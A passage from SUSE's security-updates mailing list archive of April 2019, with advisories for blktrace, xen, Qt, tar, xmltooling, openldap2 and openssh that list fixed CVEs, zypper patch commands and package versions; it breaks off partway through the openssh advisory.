   https://bugzilla.suse.com/1124825
   https://bugzilla.suse.com/1124826
   https://bugzilla.suse.com/1124827
   https://bugzilla.suse.com/1125099

From sle-security-updates at lists.suse.com  Tue Apr  9 16:09:34 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 10 Apr 2019 00:09:34 +0200 (CEST)
Subject: SUSE-SU-2019:0919-1: Security update for blktrace
Message-ID: <20190409220934.74BE0F7BB@maintenance.suse.de>

   SUSE Security Update: Security update for blktrace
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0919-1
Rating:             low
References:         #1091942
Cross-References:   CVE-2018-10689
Affected Products:
                    SUSE Linux Enterprise Module for Development Tools 15
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for blktrace fixes the following issues:

   - CVE-2018-10689: Prevent buffer overflow in the dev_map_read function
     because the device and devno arrays were too small (bsc#1091942).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Development Tools 15:

      zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-919=1

Package List:

   - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64):

      blktrace-1.1.0+git.20170126-3.3.28
      blktrace-debuginfo-1.1.0+git.20170126-3.3.28
      blktrace-debugsource-1.1.0+git.20170126-3.3.28

References:

   https://www.suse.com/security/cve/CVE-2018-10689.html
   https://bugzilla.suse.com/1091942

From sle-security-updates at lists.suse.com  Wed Apr 10 07:09:09 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 10 Apr 2019 15:09:09 +0200 (CEST)
Subject: SUSE-SU-2019:0921-1: important: Security update for xen
Message-ID: <20190410130909.0323C1013C@maintenance.suse.de>

   SUSE Security Update: Security update for xen
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0921-1
Rating:             important
References:         #1026236 #1114988 #1123157 #1126140 #1126141 #1126192
                    #1126195 #1126196 #1126198 #1126201 #1127400 #1129623
Cross-References:   CVE-2018-19967 CVE-2019-6778 CVE-2019-9824
Affected Products:
                    SUSE OpenStack Cloud 7
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server 12-SP2-LTSS
                    SUSE Linux Enterprise Server 12-SP2-BCL
                    SUSE Enterprise Storage 4
______________________________________________________________________________

   An update that solves three vulnerabilities and has 9 fixes is now
   available.

Description:

   This update for xen fixes the following issues:

   Security issues fixed:

   - Fixed an issue which could allow malicious PV guests to cause a host
     crash or gain access to data pertaining to other guests. Additionally,
     vulnerable configurations are likely to be unstable even in the absence
     of an attack (bsc#1126198).
   - Fixed multiple access violations introduced by the XENMEM_exchange
     hypercall which could allow a single PV guest to leak arbitrary amounts
     of memory, leading to a denial of service (bsc#1126192).
   - Fixed an issue which could allow a malicious unprivileged guest userspace
     process to escalate its privilege to that of other userspace processes in
     the same guest and potentially thereby to that of the guest operating
     system (bsc#1126201).
   - Fixed an issue which could allow malicious or buggy x86 PV guest kernels
     to mount a Denial of Service attack affecting the whole system
     (bsc#1126196).
   - Fixed an issue which could allow an untrusted PV domain with access to a
     physical device to DMA into its own pagetables, leading to privilege
     escalation (bsc#1126195).
   - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp
     (bsc#1123157).
   - Fixed an issue which could allow malicious 64bit PV guests to cause a
     host crash (bsc#1127400).
   - Fixed an issue which could allow malicious or buggy guests with passed
     through PCI devices to escalate their privileges, crash the host, or
     access data belonging to other guests. Additionally, memory leaks were
     also possible (bsc#1126140).
   - Fixed a race condition which could allow malicious PV guests to escalate
     their privilege to that of the hypervisor (bsc#1126141).
   - CVE-2019-9824: Fixed an information leak in the SLiRP networking
     implementation which could allow a user/process to read uninitialised
     stack memory contents (bsc#1129623).
   - CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the
     host, resulting in a Denial of Service (DoS) (XSA-282) (bsc#1114988).

   Other issue addressed:

   - Added Xen cmdline option "suse_vtsc_tolerance" to avoid TSC emulation for
     HVM domUs (bsc#1026236).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE OpenStack Cloud 7:
      zypper in -t patch SUSE-OpenStack-Cloud-7-2019-921=1
   - SUSE Linux Enterprise Server for SAP 12-SP2:
      zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-921=1
   - SUSE Linux Enterprise Server 12-SP2-LTSS:
      zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-921=1
   - SUSE Linux Enterprise Server 12-SP2-BCL:
      zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-921=1
   - SUSE Enterprise Storage 4:
      zypper in -t patch SUSE-Storage-4-2019-921=1

Package List:

   - SUSE OpenStack Cloud 7 (x86_64):
      xen-4.7.6_06-43.48.1
      xen-debugsource-4.7.6_06-43.48.1
      xen-doc-html-4.7.6_06-43.48.1
      xen-libs-32bit-4.7.6_06-43.48.1
      xen-libs-4.7.6_06-43.48.1
      xen-libs-debuginfo-32bit-4.7.6_06-43.48.1
      xen-libs-debuginfo-4.7.6_06-43.48.1
      xen-tools-4.7.6_06-43.48.1
      xen-tools-debuginfo-4.7.6_06-43.48.1
      xen-tools-domU-4.7.6_06-43.48.1
      xen-tools-domU-debuginfo-4.7.6_06-43.48.1
   - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64):
      xen-4.7.6_06-43.48.1
      xen-debugsource-4.7.6_06-43.48.1
      xen-doc-html-4.7.6_06-43.48.1
      xen-libs-32bit-4.7.6_06-43.48.1
      xen-libs-4.7.6_06-43.48.1
      xen-libs-debuginfo-32bit-4.7.6_06-43.48.1
      xen-libs-debuginfo-4.7.6_06-43.48.1
      xen-tools-4.7.6_06-43.48.1
      xen-tools-debuginfo-4.7.6_06-43.48.1
      xen-tools-domU-4.7.6_06-43.48.1
      xen-tools-domU-debuginfo-4.7.6_06-43.48.1
   - SUSE Linux Enterprise Server 12-SP2-LTSS (x86_64):
      xen-4.7.6_06-43.48.1
      xen-debugsource-4.7.6_06-43.48.1
      xen-doc-html-4.7.6_06-43.48.1
      xen-libs-32bit-4.7.6_06-43.48.1
      xen-libs-4.7.6_06-43.48.1
      xen-libs-debuginfo-32bit-4.7.6_06-43.48.1
      xen-libs-debuginfo-4.7.6_06-43.48.1
      xen-tools-4.7.6_06-43.48.1
      xen-tools-debuginfo-4.7.6_06-43.48.1
      xen-tools-domU-4.7.6_06-43.48.1
      xen-tools-domU-debuginfo-4.7.6_06-43.48.1
   - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64):
      xen-4.7.6_06-43.48.1
      xen-debugsource-4.7.6_06-43.48.1
      xen-doc-html-4.7.6_06-43.48.1
      xen-libs-32bit-4.7.6_06-43.48.1
      xen-libs-4.7.6_06-43.48.1
      xen-libs-debuginfo-32bit-4.7.6_06-43.48.1
      xen-libs-debuginfo-4.7.6_06-43.48.1
      xen-tools-4.7.6_06-43.48.1
      xen-tools-debuginfo-4.7.6_06-43.48.1
      xen-tools-domU-4.7.6_06-43.48.1
      xen-tools-domU-debuginfo-4.7.6_06-43.48.1
   - SUSE Enterprise Storage 4 (x86_64):
      xen-4.7.6_06-43.48.1
      xen-debugsource-4.7.6_06-43.48.1
      xen-doc-html-4.7.6_06-43.48.1
      xen-libs-32bit-4.7.6_06-43.48.1
      xen-libs-4.7.6_06-43.48.1
      xen-libs-debuginfo-32bit-4.7.6_06-43.48.1
      xen-libs-debuginfo-4.7.6_06-43.48.1
      xen-tools-4.7.6_06-43.48.1
      xen-tools-debuginfo-4.7.6_06-43.48.1
      xen-tools-domU-4.7.6_06-43.48.1
      xen-tools-domU-debuginfo-4.7.6_06-43.48.1

References:

   https://www.suse.com/security/cve/CVE-2018-19967.html
   https://www.suse.com/security/cve/CVE-2019-6778.html
   https://www.suse.com/security/cve/CVE-2019-9824.html
   https://bugzilla.suse.com/1026236
   https://bugzilla.suse.com/1114988
   https://bugzilla.suse.com/1123157
   https://bugzilla.suse.com/1126140
   https://bugzilla.suse.com/1126141
   https://bugzilla.suse.com/1126192
   https://bugzilla.suse.com/1126195
   https://bugzilla.suse.com/1126196
   https://bugzilla.suse.com/1126198
   https://bugzilla.suse.com/1126201
   https://bugzilla.suse.com/1127400
   https://bugzilla.suse.com/1129623


From sle-security-updates at lists.suse.com  Wed Apr 10 13:09:07 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 10 Apr 2019 21:09:07 +0200 (CEST)
Subject: SUSE-SU-2019:0927-1: moderate: Security update for libqt5-qtbase
Message-ID: <20190410190907.939901013C@maintenance.suse.de>

SUSE Security Update: Security update for libqt5-qtbase
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0927-1
Rating:             moderate
References:         #1108889 #1118597 #1129662 #1130246
Cross-References:   CVE-2018-19870 CVE-2018-19872
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Desktop Applications 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that solves two vulnerabilities and has two fixes is now available.

Description:

   This update for libqt5-qtbase fixes the following issues:

   Security issues fixed:

   - CVE-2018-19872: Fixed an issue which could allow a division by zero
     leading to a crash (bsc#1130246).
   - CVE-2018-19870: Fixed an improper check in QImage allocation which could
     allow Denial of Service when opening crafted gif files (bsc#1118597).

   Other issue addressed:

   - Fixed an issue where showing remote locations was not allowed
     (bsc#1129662).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:
      zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-927=1
   - SUSE Linux Enterprise Module for Desktop Applications 15:
      zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-927=1
   - SUSE Linux Enterprise Module for Basesystem 15:
      zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-927=1

Package List:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):
      libQt5Bootstrap-devel-static-5.9.4-8.18.2
      libqt5-qtbase-debugsource-5.9.4-8.18.2
      libqt5-qtbase-examples-5.9.4-8.18.2
      libqt5-qtbase-examples-debuginfo-5.9.4-8.18.2
   - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64):
      libQt5OpenGLExtensions-devel-static-5.9.4-8.18.2
      libQt5Sql5-mysql-5.9.4-8.18.2
      libQt5Sql5-mysql-debuginfo-5.9.4-8.18.2
      libQt5Sql5-postgresql-5.9.4-8.18.2
      libQt5Sql5-postgresql-debuginfo-5.9.4-8.18.2
      libQt5Sql5-unixODBC-5.9.4-8.18.2
      libQt5Sql5-unixODBC-debuginfo-5.9.4-8.18.2
      libqt5-qtbase-debugsource-5.9.4-8.18.2
      libqt5-qtbase-platformtheme-gtk3-5.9.4-8.18.2
      libqt5-qtbase-platformtheme-gtk3-debuginfo-5.9.4-8.18.2
   - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):
      libQt5Concurrent-devel-5.9.4-8.18.2
      libQt5Concurrent5-5.9.4-8.18.2
      libQt5Concurrent5-debuginfo-5.9.4-8.18.2
      libQt5Core-devel-5.9.4-8.18.2
      libQt5Core5-5.9.4-8.18.2
      libQt5Core5-debuginfo-5.9.4-8.18.2
      libQt5DBus-devel-5.9.4-8.18.2
      libQt5DBus-devel-debuginfo-5.9.4-8.18.2
      libQt5DBus5-5.9.4-8.18.2
      libQt5DBus5-debuginfo-5.9.4-8.18.2
      libQt5Gui-devel-5.9.4-8.18.2
      libQt5Gui5-5.9.4-8.18.2
      libQt5Gui5-debuginfo-5.9.4-8.18.2
      libQt5KmsSupport-devel-static-5.9.4-8.18.2
      libQt5Network-devel-5.9.4-8.18.2
      libQt5Network5-5.9.4-8.18.2
      libQt5Network5-debuginfo-5.9.4-8.18.2
      libQt5OpenGL-devel-5.9.4-8.18.2
      libQt5OpenGL5-5.9.4-8.18.2
      libQt5OpenGL5-debuginfo-5.9.4-8.18.2
      libQt5PlatformHeaders-devel-5.9.4-8.18.2
      libQt5PlatformSupport-devel-static-5.9.4-8.18.2
      libQt5PrintSupport-devel-5.9.4-8.18.2
      libQt5PrintSupport5-5.9.4-8.18.2
      libQt5PrintSupport5-debuginfo-5.9.4-8.18.2
      libQt5Sql-devel-5.9.4-8.18.2
      libQt5Sql5-5.9.4-8.18.2
      libQt5Sql5-debuginfo-5.9.4-8.18.2
      libQt5Sql5-sqlite-5.9.4-8.18.2
      libQt5Sql5-sqlite-debuginfo-5.9.4-8.18.2
      libQt5Test-devel-5.9.4-8.18.2
      libQt5Test5-5.9.4-8.18.2
      libQt5Test5-debuginfo-5.9.4-8.18.2
      libQt5Widgets-devel-5.9.4-8.18.2
      libQt5Widgets5-5.9.4-8.18.2
      libQt5Widgets5-debuginfo-5.9.4-8.18.2
      libQt5Xml-devel-5.9.4-8.18.2
      libQt5Xml5-5.9.4-8.18.2
      libQt5Xml5-debuginfo-5.9.4-8.18.2
      libqt5-qtbase-common-devel-5.9.4-8.18.2
      libqt5-qtbase-common-devel-debuginfo-5.9.4-8.18.2
      libqt5-qtbase-debugsource-5.9.4-8.18.2
      libqt5-qtbase-devel-5.9.4-8.18.2
   - SUSE Linux Enterprise Module for Basesystem 15 (noarch):
      libQt5Core-private-headers-devel-5.9.4-8.18.2
      libQt5DBus-private-headers-devel-5.9.4-8.18.2
      libQt5Gui-private-headers-devel-5.9.4-8.18.2
      libQt5KmsSupport-private-headers-devel-5.9.4-8.18.2
      libQt5Network-private-headers-devel-5.9.4-8.18.2
      libQt5OpenGL-private-headers-devel-5.9.4-8.18.2
      libQt5PlatformSupport-private-headers-devel-5.9.4-8.18.2
      libQt5PrintSupport-private-headers-devel-5.9.4-8.18.2
      libQt5Sql-private-headers-devel-5.9.4-8.18.2
      libQt5Test-private-headers-devel-5.9.4-8.18.2
      libQt5Widgets-private-headers-devel-5.9.4-8.18.2
      libqt5-qtbase-private-headers-devel-5.9.4-8.18.2

References:

   https://www.suse.com/security/cve/CVE-2018-19870.html
   https://www.suse.com/security/cve/CVE-2018-19872.html
   https://bugzilla.suse.com/1108889
   https://bugzilla.suse.com/1118597
   https://bugzilla.suse.com/1129662
   https://bugzilla.suse.com/1130246


From sle-security-updates at lists.suse.com  Wed Apr 10 13:12:48 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 10 Apr 2019 21:12:48 +0200 (CEST)
Subject: SUSE-SU-2019:0926-1: moderate: Security update for tar
Message-ID: <20190410191248.04D311013C@maintenance.suse.de>

SUSE Security Update: Security update for tar
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0926-1
Rating:             moderate
References:         #1120610 #1130496
Cross-References:   CVE-2018-20482 CVE-2019-9923
Affected Products:
                    SUSE Linux Enterprise Module for Open Buildservice Development Tools 15
                    SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

   An update that fixes two vulnerabilities is now available.

Description:

   This update for tar fixes the following issues:

   Security issues fixed:

   - CVE-2019-9923: Fixed a denial of service while parsing certain archives
     with malformed extended headers in pax_decode_header() (bsc#1130496).
   - CVE-2018-20482: Fixed a denial of service when the '--sparse' option
     mishandles file shrinkage during read access (bsc#1120610).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15:
      zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-926=1
   - SUSE Linux Enterprise Module for Basesystem 15:
      zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-926=1

Package List:

   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64):
      tar-debuginfo-1.30-3.3.2
      tar-debugsource-1.30-3.3.2
      tar-tests-1.30-3.3.2
      tar-tests-debuginfo-1.30-3.3.2
   - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch):
      tar-backup-scripts-1.30-3.3.2
      tar-doc-1.30-3.3.2
   - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):
      tar-1.30-3.3.2
      tar-debuginfo-1.30-3.3.2
      tar-debugsource-1.30-3.3.2
      tar-rmt-1.30-3.3.2
      tar-rmt-debuginfo-1.30-3.3.2
   - SUSE Linux Enterprise Module for Basesystem 15 (noarch):
      tar-lang-1.30-3.3.2

References:

   https://www.suse.com/security/cve/CVE-2018-20482.html
   https://www.suse.com/security/cve/CVE-2019-9923.html
   https://bugzilla.suse.com/1120610
   https://bugzilla.suse.com/1130496


From sle-security-updates at lists.suse.com  Wed Apr 10 13:15:32 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 10 Apr 2019 21:15:32 +0200 (CEST)
Subject: SUSE-SU-2019:0929-1: moderate: Security update for xmltooling
Message-ID: <20190410191532.8FC151013C@maintenance.suse.de>

SUSE Security Update: Security update for xmltooling
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0929-1
Rating:             moderate
References:         #1129537
Cross-References:   CVE-2019-9628
Affected Products:
                    SUSE Linux Enterprise Module for Server Applications 15
______________________________________________________________________________

   An update that fixes one vulnerability is now available.
Description:

   This update for xmltooling fixes the following issues:

   Security issue fixed:

   - CVE-2019-9628: Fixed an improper handling of exception in the XMLTooling
     library which could result in denial of service against the application
     using XMLTooling (bsc#1129537).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Module for Server Applications 15:
      zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-929=1

Package List:

   - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64):
      libxmltooling-devel-1.6.4-3.3.2
      libxmltooling7-1.6.4-3.3.2
      libxmltooling7-debuginfo-1.6.4-3.3.2
      xmltooling-debugsource-1.6.4-3.3.2
      xmltooling-schemas-1.6.4-3.3.2

References:

   https://www.suse.com/security/cve/CVE-2019-9628.html
   https://bugzilla.suse.com/1129537


From sle-security-updates at lists.suse.com  Wed Apr 10 13:16:06 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Wed, 10 Apr 2019 21:16:06 +0200 (CEST)
Subject: SUSE-SU-2019:0928-1: moderate: Security update for xmltooling
Message-ID: <20190410191606.DF1D21013C@maintenance.suse.de>

SUSE Security Update: Security update for xmltooling
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0928-1
Rating:             moderate
References:         #1129537
Cross-References:   CVE-2019-9628
Affected Products:
                    SUSE Linux Enterprise Software Development Kit 12-SP4
                    SUSE Linux Enterprise Software Development Kit 12-SP3
                    SUSE Linux Enterprise Server 12-SP4
                    SUSE Linux Enterprise Server 12-SP3
______________________________________________________________________________

   An update that fixes one vulnerability is now available.
Description:

   This update for xmltooling fixes the following issue:

   Security issue fixed:

   - CVE-2019-9628: Fixed an improper handling of exception in the XMLTooling
     library which could result in denial of service against the application
     using XMLTooling (bsc#1129537).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Software Development Kit 12-SP4:
      zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-928=1
   - SUSE Linux Enterprise Software Development Kit 12-SP3:
      zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-928=1
   - SUSE Linux Enterprise Server 12-SP4:
      zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-928=1
   - SUSE Linux Enterprise Server 12-SP3:
      zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-928=1

Package List:

   - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64):
      libxmltooling-devel-1.5.6-3.9.1
      xmltooling-debugsource-1.5.6-3.9.1
   - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64):
      libxmltooling-devel-1.5.6-3.9.1
      xmltooling-debugsource-1.5.6-3.9.1
   - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64):
      libxmltooling6-1.5.6-3.9.1
      libxmltooling6-debuginfo-1.5.6-3.9.1
      xmltooling-debugsource-1.5.6-3.9.1
      xmltooling-schemas-1.5.6-3.9.1
   - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64):
      libxmltooling6-1.5.6-3.9.1
      libxmltooling6-debuginfo-1.5.6-3.9.1
      xmltooling-debugsource-1.5.6-3.9.1
      xmltooling-schemas-1.5.6-3.9.1

References:

   https://www.suse.com/security/cve/CVE-2019-9628.html
   https://bugzilla.suse.com/1129537


From sle-security-updates at lists.suse.com  Thu Apr 11 07:10:53 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 11 Apr 2019 15:10:53 +0200 (CEST)
Subject: SUSE-SU-2019:0931-1: important: Security update for openldap2
Message-ID: <20190411131053.0A6F51013C@maintenance.suse.de>

SUSE Security Update: Security update for openldap2
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0931-1
Rating:             important
References:         #1031702 #1037396 #1041764 #1065083 #1073313
Cross-References:   CVE-2017-17740 CVE-2017-9287
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP4
                    SUSE Linux Enterprise Server for SAP 12-SP3
                    SUSE Linux Enterprise Server for SAP 12-SP2
                    SUSE Linux Enterprise Server for SAP 12-SP1
                    SUSE Linux Enterprise Server for SAP 12
                    SUSE Linux Enterprise Server 12-SP1-LTSS
                    SUSE Linux Enterprise Server 12-LTSS
                    SUSE Linux Enterprise Module for Legacy Software 12
______________________________________________________________________________

   An update that solves two vulnerabilities and has three fixes is now available.

Description:

   This update for openldap2 fixes the following issues:

   Security issues fixed:

   - CVE-2017-9287: A double free vulnerability in the mdb backend during
     search with page size 0 was fixed (bsc#1041764).
   - CVE-2017-17740: Fixed a denial of service (slapd crash) via a member
     MODDN operation that could have been triggered when both the nops module
     and the memberof overlay are enabled (bsc#1073313).

   Non-security issues fixed:

   - Fix a regression in handling of non-blocking connections (bsc#1031702)
   - Fix an uninitialised variable that causes startup failure (bsc#1037396)
   - Fix libldap leaking socket descriptors (bsc#1065083)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP4:
      zypper in -t patch SUSE-SLE-SAP-12-SP4-2019-931=1
   - SUSE Linux Enterprise Server for SAP 12-SP3:
      zypper in -t patch SUSE-SLE-SAP-12-SP3-2019-931=1
   - SUSE Linux Enterprise Server for SAP 12-SP2:
      zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-931=1
   - SUSE Linux Enterprise Server for SAP 12-SP1:
      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-931=1
   - SUSE Linux Enterprise Server for SAP 12:
      zypper in -t patch SUSE-SLE-SAP-12-2019-931=1
   - SUSE Linux Enterprise Server 12-SP1-LTSS:
      zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-931=1
   - SUSE Linux Enterprise Server 12-LTSS:
      zypper in -t patch SUSE-SLE-SERVER-12-2019-931=1
   - SUSE Linux Enterprise Module for Legacy Software 12:
      zypper in -t patch SUSE-SLE-Module-Legacy-12-2019-931=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP4 (ppc64le x86_64):
      compat-libldap-2_3-0-2.3.37-18.24.9.7
      compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7
   - SUSE Linux Enterprise Server for SAP 12-SP3 (ppc64le x86_64):
      compat-libldap-2_3-0-2.3.37-18.24.9.7
      compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7
   - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64):
      compat-libldap-2_3-0-2.3.37-18.24.9.7
      compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7
   - SUSE Linux Enterprise Server for SAP 12-SP1 (ppc64le x86_64):
      compat-libldap-2_3-0-2.3.37-18.24.9.7
      compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7
      libldap-2_4-2-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-2.4.41-18.24.9.1
      openldap2-2.4.41-18.24.9.7
      openldap2-back-meta-2.4.41-18.24.9.7
      openldap2-back-meta-debuginfo-2.4.41-18.24.9.7
      openldap2-client-2.4.41-18.24.9.1
      openldap2-client-debuginfo-2.4.41-18.24.9.1
      openldap2-client-debugsource-2.4.41-18.24.9.1
      openldap2-debuginfo-2.4.41-18.24.9.7
      openldap2-debugsource-2.4.41-18.24.9.7
   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):
      libldap-2_4-2-32bit-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1
   - SUSE Linux Enterprise Server for SAP 12 (x86_64):
      compat-libldap-2_3-0-2.3.37-18.24.9.7
      compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7
      libldap-2_4-2-2.4.41-18.24.9.1
      libldap-2_4-2-32bit-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1
      openldap2-2.4.41-18.24.9.7
      openldap2-back-meta-2.4.41-18.24.9.7
      openldap2-back-meta-debuginfo-2.4.41-18.24.9.7
      openldap2-client-2.4.41-18.24.9.1
      openldap2-client-debuginfo-2.4.41-18.24.9.1
      openldap2-client-debugsource-2.4.41-18.24.9.1
      openldap2-debuginfo-2.4.41-18.24.9.7
      openldap2-debugsource-2.4.41-18.24.9.7
   - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):
      libldap-2_4-2-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-2.4.41-18.24.9.1
      openldap2-2.4.41-18.24.9.7
      openldap2-back-meta-2.4.41-18.24.9.7
      openldap2-back-meta-debuginfo-2.4.41-18.24.9.7
      openldap2-client-2.4.41-18.24.9.1
      openldap2-client-debuginfo-2.4.41-18.24.9.1
      openldap2-client-debugsource-2.4.41-18.24.9.1
      openldap2-debuginfo-2.4.41-18.24.9.7
      openldap2-debugsource-2.4.41-18.24.9.7
   - SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64):
      libldap-2_4-2-32bit-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1
   - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64):
      libldap-2_4-2-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-2.4.41-18.24.9.1
      openldap2-2.4.41-18.24.9.7
      openldap2-back-meta-2.4.41-18.24.9.7
      openldap2-back-meta-debuginfo-2.4.41-18.24.9.7
      openldap2-client-2.4.41-18.24.9.1
      openldap2-client-debuginfo-2.4.41-18.24.9.1
      openldap2-client-debugsource-2.4.41-18.24.9.1
      openldap2-debuginfo-2.4.41-18.24.9.7
      openldap2-debugsource-2.4.41-18.24.9.7
   - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64):
      libldap-2_4-2-32bit-2.4.41-18.24.9.1
      libldap-2_4-2-debuginfo-32bit-2.4.41-18.24.9.1
   - SUSE Linux Enterprise Module for Legacy Software 12 (aarch64 ppc64le s390x x86_64):
      compat-libldap-2_3-0-2.3.37-18.24.9.7
      compat-libldap-2_3-0-debuginfo-2.3.37-18.24.9.7

References:

   https://www.suse.com/security/cve/CVE-2017-17740.html
   https://www.suse.com/security/cve/CVE-2017-9287.html
   https://bugzilla.suse.com/1031702
   https://bugzilla.suse.com/1037396
   https://bugzilla.suse.com/1041764
   https://bugzilla.suse.com/1065083
   https://bugzilla.suse.com/1073313


From sle-security-updates at lists.suse.com  Thu Apr 11 13:09:28 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Thu, 11 Apr 2019 21:09:28 +0200 (CEST)
Subject: SUSE-SU-2019:14016-1: moderate: Security update for openssh
Message-ID: <20190411190928.6AA3AF7BB@maintenance.suse.de>

SUSE Security Update: Security update for openssh
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:14016-1
Rating:             moderate
References:         #1090671 #1115550 #1119183 #1121816 #1121821 #1131709
Cross-References:   CVE-2019-6109 CVE-2019-6111
Affected Products:
                    SUSE Linux Enterprise Point of Sale 11-SP3
                    SUSE Linux Enterprise Debuginfo 11-SP3
______________________________________________________________________________

   An update that solves two vulnerabilities and has four fixes is now available.

Description:

   This update for openssh fixes the following issues:

   Security vulnerabilities addressed:

   - CVE-2019-6109: Fixed a character encoding issue in the progress display
     of the scp client that could be used to manipulate client output,
     allowing for spoofing during file transfers (bsc#1121816).
   - CVE-2019-6111: Properly validate object names received by the scp client
     to prevent arbitrary file overwrites when interacting with a malicious SSH
     server (bsc#1121821).

   Other issues fixed:

   - Fixed two race conditions in sshd relating to SIGHUP (bsc#1119183).
   - Returned proper reason for port forwarding failures (bsc#1090671).
   - Fixed SSHD termination of multichannel sessions with non-root users
     (bsc#1115550).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

